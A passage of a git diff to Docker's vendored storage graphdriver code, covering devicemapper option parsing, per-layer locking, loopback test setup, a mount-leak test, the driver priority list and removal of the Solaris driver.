+		case "dm.thinp_autoextend_percent":
+			per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32)
+			if err != nil {
+				return nil, errors.Wrapf(err, "could not parse `dm.thinp_autoextend_percent=%s`", val)
+			}
+			if per > 100 {
+				return nil, errors.New("dm.thinp_autoextend_percent must be greater than 0 and less than 100")
+			}
+			lvmSetupConfig.AutoExtendPercent = per
+		case "dm.thinp_autoextend_threshold":
+			per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32)
+			if err != nil {
+				return nil, errors.Wrapf(err, "could not parse `dm.thinp_autoextend_threshold=%s`", val)
+			}
+			if per > 100 {
+				return nil, errors.New("dm.thinp_autoextend_threshold must be greater than 0 and less than 100")
+			}
+			lvmSetupConfig.AutoExtendThreshold = per
+		case "dm.libdm_log_level":
+			level, err := strconv.ParseInt(val, 10, 32)
+			if err != nil {
+				return nil, errors.Wrapf(err, "could not parse `dm.libdm_log_level=%s`", val)
+			}
+			if level < devicemapper.LogLevelFatal || level > devicemapper.LogLevelDebug {
+				return nil, errors.Errorf("dm.libdm_log_level must be in range [%d,%d]", devicemapper.LogLevelFatal, devicemapper.LogLevelDebug)
+			}
+			// Register a new logging callback with the specified level.
+			devicemapper.LogInit(devicemapper.DefaultLogger{
+				Level: int(level),
+			})
 		default:
-			return nil, fmt.Errorf("devmapper: Unknown option %s\n", key)
+			return nil, fmt.Errorf("devmapper: Unknown option %s", key)
 		}
 	}
 
+	if err := validateLVMConfig(lvmSetupConfig); err != nil {
+		return nil, err
+	}
+
+	devices.lvmSetupConfig = lvmSetupConfig
+
 	// By default, don't do blk discard hack on raw devices, its rarely useful and is expensive
 	if !foundBlkDiscard && (devices.dataDevice != "" || devices.thinPoolDevice != "") {
 		devices.doBlkDiscard = false
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go
index 9ab3e4f864..98ff5cf124 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go
@@ -1,4 +1,4 @@
-package devmapper
+package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper"
 
 // Definition of struct dm_task and sub structures (from lvm2)
 //
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go
index 5c2abcefcb..bda907a5d6 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go
@@ -1,27 +1,72 @@
 // +build linux
 
-package devmapper
+package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper"
 
 import (
 	"fmt"
+	"os"
+	"os/exec"
+	"syscall"
 	"testing"
 	"time"
 
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/daemon/graphdriver/graphtest"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"golang.org/x/sys/unix"
 )
 
 func init() {
-	// Reduce the size the the base fs and loopback for the tests
+	// Reduce the size of the base fs and loopback for the tests
 	defaultDataLoopbackSize = 300 * 1024 * 1024
 	defaultMetaDataLoopbackSize = 200 * 1024 * 1024
 	defaultBaseFsSize = 300 * 1024 * 1024
 	defaultUdevSyncOverride = true
-	if err := graphtest.InitLoopbacks(); err != nil {
+	if err := initLoopbacks(); err != nil {
 		panic(err)
 	}
 }
 
+// initLoopbacks ensures that the loopback devices are properly created within
+// the system running the device mapper tests.
+func initLoopbacks() error {
+	statT, err := getBaseLoopStats()
+	if err != nil {
+		return err
+	}
+	// create at least 8 loopback files, ya, that is a good number
+	for i := 0; i < 8; i++ {
+		loopPath := fmt.Sprintf("/dev/loop%d", i)
+		// only create new loopback files if they don't exist
+		if _, err := os.Stat(loopPath); err != nil {
+			if mkerr := syscall.Mknod(loopPath,
+				uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil {
+				return mkerr
+			}
+			os.Chown(loopPath, int(statT.Uid), int(statT.Gid))
+		}
+	}
+	return nil
+}
+
+// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the
+// loop0 device on the system.  If it does not exist we assume 0,0,0660 for the
+// stat data
+func getBaseLoopStats() (*syscall.Stat_t, error) {
+	loop0, err := os.Stat("/dev/loop0")
+	if err != nil {
+		if os.IsNotExist(err) {
+			return &syscall.Stat_t{
+				Uid:  0,
+				Gid:  0,
+				Mode: 0660,
+			}, nil
+		}
+		return nil, err
+	}
+	return loop0.Sys().(*syscall.Stat_t), nil
+}
+
 // This avoids creating a new driver for each test if all tests are run
 // Make sure to put new tests between TestDevmapperSetup and TestDevmapperTeardown
 func TestDevmapperSetup(t *testing.T) {
@@ -59,7 +104,7 @@ func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataS
 	defer graphtest.PutDriver(t)
 	// make sure data or metadata loopback size are the default size
 	if s := driver.DeviceSet.Status(); s.Data.Total != uint64(defaultDataLoopbackSize) || s.Metadata.Total != uint64(defaultMetaDataLoopbackSize) {
-		t.Fatalf("data or metadata loop back size is incorrect")
+		t.Fatal("data or metadata loop back size is incorrect")
 	}
 	if err := driver.Cleanup(); err != nil {
 		t.Fatal(err)
@@ -74,7 +119,7 @@ func testChangeLoopBackSize(t *testing.T, delta, expectDataSize, expectMetaDataS
 	}
 	driver = d.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver)
 	if s := driver.DeviceSet.Status(); s.Data.Total != uint64(expectDataSize) || s.Metadata.Total != uint64(expectMetaDataSize) {
-		t.Fatalf("data or metadata loop back size is incorrect")
+		t.Fatal("data or metadata loop back size is incorrect")
 	}
 	if err := driver.Cleanup(); err != nil {
 		t.Fatal(err)
@@ -104,7 +149,57 @@ func TestDevmapperLockReleasedDeviceDeletion(t *testing.T) {
 		// function return and we are deadlocked. Release lock
 		// here so that cleanup could succeed and fail the test.
 		driver.DeviceSet.Unlock()
-		t.Fatalf("Could not acquire devices lock after call to cleanupDeletedDevices()")
+		t.Fatal("Could not acquire devices lock after call to cleanupDeletedDevices()")
 	case <-doneChan:
 	}
 }
+
+// Ensure that mounts aren't leakedriver. It's non-trivial for us to test the full
+// reproducer of #34573 in a unit test, but we can at least make sure that a
+// simple command run in a new namespace doesn't break things horribly.
+func TestDevmapperMountLeaks(t *testing.T) {
+	if !kernel.CheckKernelVersion(3, 18, 0) {
+		t.Skipf("kernel version <3.18.0 and so is missing torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe.")
+	}
+
+	driver := graphtest.GetDriver(t, "devicemapper", "dm.use_deferred_removal=false", "dm.use_deferred_deletion=false").(*graphtest.Driver).Driver.(*graphdriver.NaiveDiffDriver).ProtoDriver.(*Driver)
+	defer graphtest.PutDriver(t)
+
+	// We need to create a new (dummy) device.
+	if err := driver.Create("some-layer", "", nil); err != nil {
+		t.Fatalf("setting up some-layer: %v", err)
+	}
+
+	// Mount the device.
+	_, err := driver.Get("some-layer", "")
+	if err != nil {
+		t.Fatalf("mounting some-layer: %v", err)
+	}
+
+	// Create a new subprocess which will inherit our mountpoint, then
+	// intentionally leak it and stick around. We can't do this entirely within
+	// Go because forking and namespaces in Go are really not handled well at
+	// all.
+	cmd := exec.Cmd{
+		Path: "/bin/sh",
+		Args: []string{
+			"/bin/sh", "-c",
+			"mount --make-rprivate / && sleep 1000s",
+		},
+		SysProcAttr: &syscall.SysProcAttr{
+			Unshareflags: syscall.CLONE_NEWNS,
+		},
+	}
+	if err := cmd.Start(); err != nil {
+		t.Fatalf("starting sub-command: %v", err)
+	}
+	defer func() {
+		unix.Kill(cmd.Process.Pid, unix.SIGKILL)
+		cmd.Wait()
+	}()
+
+	// Now try to "drop" the device.
+	if err := driver.Put("some-layer"); err != nil {
+		t.Fatalf("unmounting some-layer: %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go
index 7cf422ce6a..df883de31d 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package devmapper
+package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper"
 
 import (
 	"fmt"
@@ -9,13 +9,16 @@ import (
 	"path"
 	"strconv"
 
-	"github.com/Sirupsen/logrus"
-
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/devicemapper"
 	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/locker"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/go-units"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func init() {
@@ -29,6 +32,7 @@ type Driver struct {
 	uidMaps []idtools.IDMap
 	gidMaps []idtools.IDMap
 	ctr     *graphdriver.RefCounter
+	locker  *locker.Locker
 }
 
 // Init creates a driver with the given home and the set of options.
@@ -38,16 +42,13 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		return nil, err
 	}
 
-	if err := mount.MakePrivate(home); err != nil {
-		return nil, err
-	}
-
 	d := &Driver{
 		DeviceSet: deviceSet,
 		home:      home,
 		uidMaps:   uidMaps,
 		gidMaps:   gidMaps,
 		ctr:       graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()),
+		locker:    locker.New(),
 	}
 
 	return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil
@@ -65,22 +66,17 @@ func (d *Driver) Status() [][2]string {
 
 	status := [][2]string{
 		{"Pool Name", s.PoolName},
-		{"Pool Blocksize", fmt.Sprintf("%s", units.HumanSize(float64(s.SectorSize)))},
-		{"Base Device Size", fmt.Sprintf("%s", units.HumanSize(float64(s.BaseDeviceSize)))},
+		{"Pool Blocksize", units.HumanSize(float64(s.SectorSize))},
+		{"Base Device Size", units.HumanSize(float64(s.BaseDeviceSize))},
 		{"Backing Filesystem", s.BaseDeviceFS},
-		{"Data file", s.DataFile},
-		{"Metadata file", s.MetadataFile},
-		{"Data Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Used)))},
-		{"Data Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Total)))},
-		{"Data Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Data.Available)))},
-		{"Metadata Space Used", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Used)))},
-		{"Metadata Space Total", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Total)))},
-		{"Metadata Space Available", fmt.Sprintf("%s", units.HumanSize(float64(s.Metadata.Available)))},
-		{"Thin Pool Minimum Free Space", fmt.Sprintf("%s", units.HumanSize(float64(s.MinFreeSpace)))},
 		{"Udev Sync Supported", fmt.Sprintf("%v", s.UdevSyncSupported)},
-		{"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)},
-		{"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)},
-		{"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)},
+	}
+
+	if len(s.DataFile) > 0 {
+		status = append(status, [2]string{"Data file", s.DataFile})
+	}
+	if len(s.MetadataFile) > 0 {
+		status = append(status, [2]string{"Metadata file", s.MetadataFile})
 	}
 	if len(s.DataLoopback) > 0 {
 		status = append(status, [2]string{"Data loop file", s.DataLoopback})
@@ -88,6 +84,20 @@ func (d *Driver) Status() [][2]string {
 	if len(s.MetadataLoopback) > 0 {
 		status = append(status, [2]string{"Metadata loop file", s.MetadataLoopback})
 	}
+
+	status = append(status, [][2]string{
+		{"Data Space Used", units.HumanSize(float64(s.Data.Used))},
+		{"Data Space Total", units.HumanSize(float64(s.Data.Total))},
+		{"Data Space Available", units.HumanSize(float64(s.Data.Available))},
+		{"Metadata Space Used", units.HumanSize(float64(s.Metadata.Used))},
+		{"Metadata Space Total", units.HumanSize(float64(s.Metadata.Total))},
+		{"Metadata Space Available", units.HumanSize(float64(s.Metadata.Available))},
+		{"Thin Pool Minimum Free Space", units.HumanSize(float64(s.MinFreeSpace))},
+		{"Deferred Removal Enabled", fmt.Sprintf("%v", s.DeferredRemoveEnabled)},
+		{"Deferred Deletion Enabled", fmt.Sprintf("%v", s.DeferredDeleteEnabled)},
+		{"Deferred Deleted Device Count", fmt.Sprintf("%v", s.DeferredDeletedDeviceCount)},
+	}...)
+
 	if vStr, err := devicemapper.GetLibraryVersion(); err == nil {
 		status = append(status, [2]string{"Library Version", vStr})
 	}
@@ -112,12 +122,18 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) {
 // Cleanup unmounts a device.
 func (d *Driver) Cleanup() error {
 	err := d.DeviceSet.Shutdown(d.home)
+	umountErr := mount.RecursiveUnmount(d.home)
 
-	if err2 := mount.Unmount(d.home); err == nil {
-		err = err2
+	// in case we have two errors, prefer the one from Shutdown()
+	if err != nil {
+		return err
 	}
 
-	return err
+	if umountErr != nil {
+		return errors.Wrapf(umountErr, "error unmounting %s", d.home)
+	}
+
+	return nil
 }
 
 // CreateReadWrite creates a layer that is writable for use as a container
@@ -132,16 +148,13 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
 	if opts != nil {
 		storageOpt = opts.StorageOpt
 	}
-
-	if err := d.DeviceSet.AddDevice(id, parent, storageOpt); err != nil {
-		return err
-	}
-
-	return nil
+	return d.DeviceSet.AddDevice(id, parent, storageOpt)
 }
 
-// Remove removes a device with a given id, unmounts the filesystem.
+// Remove removes a device with a given id, unmounts the filesystem, and removes the mount point.
 func (d *Driver) Remove(id string) error {
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	if !d.DeviceSet.HasDevice(id) {
 		// Consider removing a non-existing device a no-op
 		// This is useful to be able to progress on container removal
@@ -151,51 +164,61 @@ func (d *Driver) Remove(id string) error {
 
 	// This assumes the device has been properly Get/Put:ed and thus is unmounted
 	if err := d.DeviceSet.DeleteDevice(id, false); err != nil {
-		return err
+		return fmt.Errorf("failed to remove device %s: %v", id, err)
 	}
 
+	// Most probably the mount point is already removed on Put()
+	// (see DeviceSet.UnmountDevice()), but just in case it was not
+	// let's try to remove it here as well, ignoring errors as
+	// an older kernel can return EBUSY if e.g. the mount was leaked
+	// to other mount namespaces. A failure to remove the container's
+	// mount point is not important and should not be treated
+	// as a failure to remove the container.
 	mp := path.Join(d.home, "mnt", id)
-	if err := os.RemoveAll(mp); err != nil && !os.IsNotExist(err) {
-		return err
+	err := unix.Rmdir(mp)
+	if err != nil && !os.IsNotExist(err) {
+		logrus.WithField("storage-driver", "devicemapper").Warnf("unable to remove mount point %q: %s", mp, err)
 	}
 
 	return nil
 }
 
 // Get mounts a device with given id into the root filesystem
-func (d *Driver) Get(id, mountLabel string) (string, error) {
+func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	mp := path.Join(d.home, "mnt", id)
 	rootFs := path.Join(mp, "rootfs")
 	if count := d.ctr.Increment(mp); count > 1 {
-		return rootFs, nil
+		return containerfs.NewLocalContainerFS(rootFs), nil
 	}
 
 	uid, gid, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
 	if err != nil {
 		d.ctr.Decrement(mp)
-		return "", err
+		return nil, err
 	}
 
 	// Create the target directories if they don't exist
-	if err := idtools.MkdirAllAs(path.Join(d.home, "mnt"), 0755, uid, gid); err != nil && !os.IsExist(err) {
+	if err := idtools.MkdirAllAndChown(path.Join(d.home, "mnt"), 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil {
 		d.ctr.Decrement(mp)
-		return "", err
+		return nil, err
 	}
-	if err := idtools.MkdirAs(mp, 0755, uid, gid); err != nil && !os.IsExist(err) {
+	if err := idtools.MkdirAndChown(mp, 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil && !os.IsExist(err) {
 		d.ctr.Decrement(mp)
-		return "", err
+		return nil, err
 	}
 
 	// Mount the device
 	if err := d.DeviceSet.MountDevice(id, mp, mountLabel); err != nil {
 		d.ctr.Decrement(mp)
-		return "", err
+		return nil, err
 	}
 
-	if err := idtools.MkdirAllAs(rootFs, 0755, uid, gid); err != nil && !os.IsExist(err) {
+	if err := idtools.MkdirAllAndChown(rootFs, 0755, idtools.IDPair{UID: uid, GID: gid}); err != nil {
 		d.ctr.Decrement(mp)
 		d.DeviceSet.UnmountDevice(id, mp)
-		return "", err
+		return nil, err
 	}
 
 	idFile := path.Join(mp, "id")
@@ -205,23 +228,27 @@ func (d *Driver) Get(id, mountLabel string) (string, error) {
 		if err := ioutil.WriteFile(idFile, []byte(id), 0600); err != nil {
 			d.ctr.Decrement(mp)
 			d.DeviceSet.UnmountDevice(id, mp)
-			return "", err
+			return nil, err
 		}
 	}
 
-	return rootFs, nil
+	return containerfs.NewLocalContainerFS(rootFs), nil
 }
 
 // Put unmounts a device and removes it.
 func (d *Driver) Put(id string) error {
+	d.locker.Lock(id)
+	defer d.locker.Unlock(id)
 	mp := path.Join(d.home, "mnt", id)
 	if count := d.ctr.Decrement(mp); count > 0 {
 		return nil
 	}
+
 	err := d.DeviceSet.UnmountDevice(id, mp)
 	if err != nil {
-		logrus.Errorf("devmapper: Error unmounting device %s: %s", id, err)
+		logrus.WithField("storage-driver", "devicemapper").Errorf("Error unmounting device %s: %v", id, err)
 	}
+
 	return err
 }
 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go
index cca1fe1b38..78d05b0792 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go
@@ -1,36 +1,13 @@
 // +build linux
 
-package devmapper
+package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper"
 
 import (
 	"bytes"
 	"fmt"
 	"os"
-	"path/filepath"
-	"syscall"
 )
 
-// FIXME: this is copy-pasted from the aufs driver.
-// It should be moved into the core.
-
-// Mounted returns true if a mount point exists.
-func Mounted(mountpoint string) (bool, error) {
-	mntpoint, err := os.Stat(mountpoint)
-	if err != nil {
-		if os.IsNotExist(err) {
-			return false, nil
-		}
-		return false, err
-	}
-	parent, err := os.Stat(filepath.Join(mountpoint, ".."))
-	if err != nil {
-		return false, err
-	}
-	mntpointSt := mntpoint.Sys().(*syscall.Stat_t)
-	parentSt := parent.Sys().(*syscall.Stat_t)
-	return mntpointSt.Dev != parentSt.Dev, nil
-}
-
 type probeData struct {
 	fsName string
 	magic  string
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go
index f0bce562b7..a9e1957393 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/driver.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver.go
@@ -1,17 +1,17 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 import (
-	"errors"
 	"fmt"
 	"io"
 	"os"
 	"path/filepath"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 	"github.com/vbatts/tar-split/tar/storage"
 
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/plugingetter"
 )
@@ -27,13 +27,6 @@ const (
 var (
 	// All registered drivers
 	drivers map[string]InitFunc
-
-	// ErrNotSupported returned when driver is not supported.
-	ErrNotSupported = errors.New("driver not supported")
-	// ErrPrerequisites retuned when driver does not meet prerequisites.
-	ErrPrerequisites = errors.New("prerequisites for driver not satisfied (wrong filesystem?)")
-	// ErrIncompatibleFS returned when file system is not supported.
-	ErrIncompatibleFS = fmt.Errorf("backing file system is unsupported for this graph driver")
 )
 
 //CreateOpts contains optional arguments for Create() and CreateReadWrite()
@@ -68,7 +61,7 @@ type ProtoDriver interface {
 	// Get returns the mountpoint for the layered filesystem referred
 	// to by this id. You can optionally specify a mountLabel or "".
 	// Returns the absolute path to the mounted layered filesystem.
-	Get(id, mountLabel string) (dir string, err error)
+	Get(id, mountLabel string) (fs containerfs.ContainerFS, err error)
 	// Put releases the system resources for the specified id,
 	// e.g, unmounting layered filesystem.
 	Put(id string) error
@@ -112,6 +105,23 @@ type Driver interface {
 	DiffDriver
 }
 
+// Capabilities defines a list of capabilities a driver may implement.
+// These capabilities are not required; however, they do determine how a
+// graphdriver can be used.
+type Capabilities struct {
+	// Flags that this driver is capable of reproducing exactly equivalent
+	// diffs for read-only layers. If set, clients can rely on the driver
+	// for consistent tar streams, and avoid extra processing to account
+	// for potential differences (eg: the layer store's use of tar-split).
+	ReproducesExactDiffs bool
+}
+
+// CapabilityDriver is the interface for layered file system drivers that
+// can report on their Capabilities.
+type CapabilityDriver interface {
+	Capabilities() Capabilities
+}
+
 // DiffGetterDriver is the interface for layered file system drivers that
 // provide a specialized function for getting file contents for tar-split.
 type DiffGetterDriver interface {
@@ -190,7 +200,9 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err
 
 	// Guess for prior driver
 	driversMap := scanPriorDrivers(config.Root)
-	for _, name := range priority {
+	list := strings.Split(priority, ",")
+	logrus.Debugf("[graphdriver] priority list: %v", list)
+	for _, name := range list {
 		if name == "vfs" {
 			// don't use vfs even if there is state present.
 			continue
@@ -225,10 +237,10 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err
 	}
 
 	// Check for priority drivers first
-	for _, name := range priority {
+	for _, name := range list {
 		driver, err := getBuiltinDriver(name, config.Root, config.DriverOptions, config.UIDMaps, config.GIDMaps)
 		if err != nil {
-			if isDriverNotSupported(err) {
+			if IsDriverNotSupported(err) {
 				continue
 			}
 			return nil, err
@@ -240,7 +252,7 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err
 	for name, initFunc := range drivers {
 		driver, err := initFunc(filepath.Join(config.Root, name), config.DriverOptions, config.UIDMaps, config.GIDMaps)
 		if err != nil {
-			if isDriverNotSupported(err) {
+			if IsDriverNotSupported(err) {
 				continue
 			}
 			return nil, err
@@ -250,12 +262,6 @@ func New(name string, pg plugingetter.PluginGetter, config Options) (Driver, err
 	return nil, fmt.Errorf("No supported storage backend found")
 }
 
-// isDriverNotSupported returns true if the error initializing
-// the graph driver is a non-supported error.
-func isDriverNotSupported(err error) bool {
-	return err == ErrNotSupported || err == ErrPrerequisites || err == ErrIncompatibleFS
-}
-
 // scanPriorDrivers returns an un-ordered scan of directories of prior storage drivers
 func scanPriorDrivers(root string) map[string]bool {
 	driversMap := make(map[string]bool)
@@ -263,8 +269,39 @@ func scanPriorDrivers(root string) map[string]bool {
 	for driver := range drivers {
 		p := filepath.Join(root, driver)
 		if _, err := os.Stat(p); err == nil && driver != "vfs" {
-			driversMap[driver] = true
+			if !isEmptyDir(p) {
+				driversMap[driver] = true
+			}
 		}
 	}
 	return driversMap
 }
+
+// IsInitialized checks if the driver's home-directory exists and is non-empty.
+func IsInitialized(driverHome string) bool {
+	_, err := os.Stat(driverHome)
+	if os.IsNotExist(err) {
+		return false
+	}
+	if err != nil {
+		logrus.Warnf("graphdriver.IsInitialized: stat failed: %v", err)
+	}
+	return !isEmptyDir(driverHome)
+}
+
+// isEmptyDir checks if a directory is empty. It is used to check if prior
+// storage-driver directories exist. If an error occurs, it also assumes the
+// directory is not empty (which preserves the behavior _before_ this check
+// was added)
+func isEmptyDir(name string) bool {
+	f, err := os.Open(name)
+	if err != nil {
+		return false
+	}
+	defer f.Close()
+
+	if _, err = f.Readdirnames(1); err == io.EOF {
+		return true
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go
index 2891a84f3a..cd83c4e21a 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go
@@ -1,17 +1,19 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
-import "syscall"
+import (
+	"syscall"
+
+	"golang.org/x/sys/unix"
+)
 
 var (
-	// Slice of drivers that should be used in an order
-	priority = []string{
-		"zfs",
-	}
+	// List of drivers that should be used in an order
+	priority = "zfs"
 )
 
 // Mounted checks if the given path is mounted as the fs type
 func Mounted(fsType FsMagic, mountPath string) (bool, error) {
-	var buf syscall.Statfs_t
+	var buf unix.Statfs_t
 	if err := syscall.Statfs(mountPath, &buf); err != nil {
 		return false, err
 	}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go
index 5c8d0e2301..61c6b24a9c 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go
@@ -1,12 +1,8 @@
-// +build linux
-
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 import (
-	"path/filepath"
-	"syscall"
-
 	"github.com/docker/docker/pkg/mount"
+	"golang.org/x/sys/unix"
 )
 
 const (
@@ -51,22 +47,15 @@ const (
 )
 
 var (
-	// Slice of drivers that should be used in an order
-	priority = []string{
-		"aufs",
-		"btrfs",
-		"zfs",
-		"overlay2",
-		"overlay",
-		"devicemapper",
-		"vfs",
-	}
+	// List of drivers that should be used in an order
+	priority = "btrfs,zfs,overlay2,aufs,overlay,devicemapper,vfs"
 
 	// FsNames maps filesystem id to name of the filesystem.
 	FsNames = map[FsMagic]string{
 		FsMagicAufs:        "aufs",
 		FsMagicBtrfs:       "btrfs",
 		FsMagicCramfs:      "cramfs",
+		FsMagicEcryptfs:    "ecryptfs",
 		FsMagicExtfs:       "extfs",
 		FsMagicF2fs:        "f2fs",
 		FsMagicGPFS:        "gpfs",
@@ -88,14 +77,14 @@ var (
 
 // GetFSMagic returns the filesystem id given the path.
 func GetFSMagic(rootpath string) (FsMagic, error) {
-	var buf syscall.Statfs_t
-	if err := syscall.Statfs(filepath.Dir(rootpath), &buf); err != nil {
+	var buf unix.Statfs_t
+	if err := unix.Statfs(rootpath, &buf); err != nil {
 		return 0, err
 	}
 	return FsMagic(buf.Type), nil
 }
 
-// NewFsChecker returns a checker configured for the provied FsMagic
+// NewFsChecker returns a checker configured for the provided FsMagic
 func NewFsChecker(t FsMagic) Checker {
 	return &fsChecker{
 		t: t,
@@ -127,8 +116,8 @@ func (c *defaultChecker) IsMounted(path string) bool {
 
 // Mounted checks if the given path is mounted as the fs type
 func Mounted(fsType FsMagic, mountPath string) (bool, error) {
-	var buf syscall.Statfs_t
-	if err := syscall.Statfs(mountPath, &buf); err != nil {
+	var buf unix.Statfs_t
+	if err := unix.Statfs(mountPath, &buf); err != nil {
 		return false, err
 	}
 	return FsMagic(buf.Type) == fsType, nil
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go
deleted file mode 100644
index 7daf01c32d..0000000000
--- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go
+++ /dev/null
@@ -1,97 +0,0 @@
-// +build solaris,cgo
-
-package graphdriver
-
-/*
-#include <sys/statvfs.h>
-#include <stdlib.h>
-
-static inline struct statvfs *getstatfs(char *s) {
-        struct statvfs *buf;
-        int err;
-        buf = (struct statvfs *)malloc(sizeof(struct statvfs));
-        err = statvfs(s, buf);
-        return buf;
-}
-*/
-import "C"
-import (
-	"path/filepath"
-	"unsafe"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/pkg/mount"
-)
-
-const (
-	// FsMagicZfs filesystem id for Zfs
-	FsMagicZfs = FsMagic(0x2fc12fc1)
-)
-
-var (
-	// Slice of drivers that should be used in an order
-	priority = []string{
-		"zfs",
-	}
-
-	// FsNames maps filesystem id to name of the filesystem.
-	FsNames = map[FsMagic]string{
-		FsMagicZfs: "zfs",
-	}
-)
-
-// GetFSMagic returns the filesystem id given the path.
-func GetFSMagic(rootpath string) (FsMagic, error) {
-	return 0, nil
-}
-
-type fsChecker struct {
-	t FsMagic
-}
-
-func (c *fsChecker) IsMounted(path string) bool {
-	m, _ := Mounted(c.t, path)
-	return m
-}
-
-// NewFsChecker returns a checker configured for the provied FsMagic
-func NewFsChecker(t FsMagic) Checker {
-	return &fsChecker{
-		t: t,
-	}
-}
-
-// NewDefaultChecker returns a check that parses /proc/mountinfo to check
-// if the specified path is mounted.
-// No-op on Solaris.
-func NewDefaultChecker() Checker {
-	return &defaultChecker{}
-}
-
-type defaultChecker struct {
-}
-
-func (c *defaultChecker) IsMounted(path string) bool {
-	m, _ := mount.Mounted(path)
-	return m
-}
-
-// Mounted checks if the given path is mounted as the fs type
-//Solaris supports only ZFS for now
-func Mounted(fsType FsMagic, mountPath string) (bool, error) {
-
-	cs := C.CString(filepath.Dir(mountPath))
-	buf := C.getstatfs(cs)
-
-	// on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ]
-	if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) ||
-		(buf.f_basetype[3] != 0) {
